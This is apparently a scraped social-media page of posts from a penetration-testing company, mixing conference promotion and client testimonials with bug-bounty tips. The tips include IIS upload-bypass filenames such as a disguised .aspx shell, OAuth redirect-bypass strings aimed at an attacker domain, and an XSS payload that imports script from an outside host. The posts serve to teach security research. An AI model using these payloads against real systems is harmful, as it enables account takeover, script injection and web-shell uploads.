Olivia
Online
#NULLCON Goa 2026
Good people, great talks, better conversations.
Packed rooms. Sharp talks. The kind of energy you only get when you put 1000+ security researchers in one place who all speak the same language, exploits, CVEs, and caffeine.
Will AI replace hackers? 🤖📷
Meenal from TeamBounters breaks it down in below video!
First of our AI/ML Hacking series 📷
Watch here: https://t.co/cCOiVfaVRZ
Throwback to 2017. 📹
Our founder @mr_hacker0007 dropped this gem back in the day, a custom Python C2 server (v1.0).
Core idea? Barely changed.
Even now at @TeamBounters, VAPT & red teaming means writing custom scripts to get the job done.
Link: https://t.co/KjkgMDjySd
One bad package. That’s all it takes. 📦⚠️
We’re seeing attackers target JS supply chains, not just code.
• Maintainer account takeovers
• Typosquatting (expresss, node-fetch)
• Dependency confusion in monorepos
Lock registries, inspect install scripts, enforce 2FA.
Who to follow
gujjuboy10x00
@vis_hacker
Vishal Panchani Security Engineer | Hall of Fame: Google, PayPal, Apple, 500+| Top 10 All-Time on HackerOne | Hack the planet
Behroz Alam
@behroznathwani
@immunefi | SRT | HackerOne: https://t.co/gZQYhea6By | Bugcrowd: https://t.co/gWzmhpMYby
Sharan Panegav
@PanegavSharan
InfoSec Enthusiast, Bug Hunter, Dota 2 Addict
🔐 CORS Made Simple, A Quick Cheat Sheet
CORS is one of those basic vulnerabilities that still confuses a lot of people.
Here’s a quick way to understand when CORS actually becomes dangerous.
#WebSecurity #AppSec #BugBountyTips #Pentesting #CyberSecurity #infosec
Old IIS servers still bite.
We’re still seeing bypasses like:
• .cer, .asa
• shell.aspx;1.jpg
• .asmx, .xamlx
#CyberSecurity #BugBountyTips #WebSecurity #AppSec #InfoSec #infosec
🚨 XXE Payloads & WAF Bypass 🚨
This cheatsheet highlights XXE bypass techniques we still see working during penetration tests and bug hunting:
#bugbountytips #appsec #infosec #CybersecurityNews #teambounters
🔐 OAuth Redirect Tricks That Still Catch Many Apps Off Guard
A few examples:
https://lol .com\@x.com
//example .com%0a%https://t.co/EZFGNIJ3IB
//example .com%0a%https://t.co/DBQ1qeLTIP
#bugbountytips #appsec #InfoSec
A POC for CVE-2025-55182
https://t.co/BcyJ1UbivA
🚨 Critical RCE Alert — WSUS Servers 🚨
CVE-2025-59287 (CVSS 9.8) allows unauthenticated remote attackers to gain SYSTEM access via a deserialization flaw.
Potentially wormable across WSUS instances.
➡️ Patch immediately!
#BugBounty #CyberSecurity #TeamBounters #PenTesting
We're incredibly proud to share this recent feedback from our client following their VAPT. It confirms our commitment to being more than just a vendor.
This is why we do what we do. Thank you for the shout out! Securing Every Bit.
#vapt #pentest #cybersecurity #bugbountytips
A clever Oauth Redirect Bypass by @mr_hacker0007 on #bugbountytips It's a great reminder, always whitelist your redirect URIs strictly...
#pentesting #hacking #vapt #teambounters
Just dropped a fun OAuth Open Redirect find on #bugbounty
PoC :
https://t.co/StRAjqrav5.<ATTACKER-DOMAIN>/authorize/
Bypass1 (redirect trick):
...redirect_uri=https://t.co/jSRFCCzkvV
Bypass2 (alternate host):
...redirect_uri=https://t.co/8t6WSszdM0
#hacking #teambounters
#bugbountytips found during a pentest: inconsistent escaping in URL credential fields.
Example: https://t.co/JGHSleXOy3'-aa-' got escaped after @ but not before.
PoC payload: https://'-import('https:https://t.co/SgeshyiiQx')-'@www.example.com
#BugBounty #XSS #VAPT #TeamBounters
Just finished a web VAPT for an e-com client.
They’d already done 2 rounds before… we still pulled out a payment bypass + PII disclosure
Client shocked @TeamBounters rocked!
#VAPT #infosec #BugBounty #CyberSecurity #pentest
We just wrapped a VAPT engagement and the client's words say it all:
“Smooth, effective, and deeply knowledgeable.”
Looking to level up your app, API, or infra security?
📩 [email protected]
#CyberSecurity #VAPT #AppSec #TeamBounters #Infosec #pentest
I hacked a popular vibe coding platform with a simple, straight-forward logic flaw - allowing access to private applications . Here’s how I did it 🧵
🚨 1 Hour Critical Find – Java Deserialization
In just 60 minutes, we uncovered a critical vuln.
No luck. Just TeamBounters mindset: deep logic analysis + custom recon tools.
Real pentesting. Real results.
#Cybersecurity #VAPT #BugBounty #TeamBounters #Pentesting
They had already done a pentest. from a big name vendor.
But we still found:
- A critical Account Takeover
- Broken access control flaws
- Business logic bugs their previous vendor missed
#vapt #BugBounty #Pentesting #Hacking
7 mistakes that beginner Web3 security researchers make (and how to fix them) 🧵👇
This could be a great resource for security researchers looking to expand their skills in reverse engineering.
What other learning platforms do you recommend? Drop your suggestions in the comments! 👇
#bugbounty #hacking #bugbountytips #cybersecuritytips #infosec
Last Seen Users on Sotwe
Most Popular Users
Elon Musk 
@elonmusk
240.5M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.7M followers
Cristiano Ronaldo
@cristiano
110.3M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.6M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.8M followers
KATY PERRY
@katyperry
87.5M followers
Taylor Swift
@taylorswift13
81.3M followers
Lady Gaga
@ladygaga
72.9M followers
Kim Kardashian
@kimkardashian
69.7M followers
Virat Kohli
@imvkohli
69.6M followers
YouTube
@youtube
68.7M followers
Bill Gates
@billgates
63.8M followers
The Ellen Show
@theellenshow
62.5M followers
Neymar Jr
@neymarjr
62.3M followers
CNN
@cnn
61.9M followers
X
@x
60.8M followers
Selena Gomez
@selenagomez
60.6M followers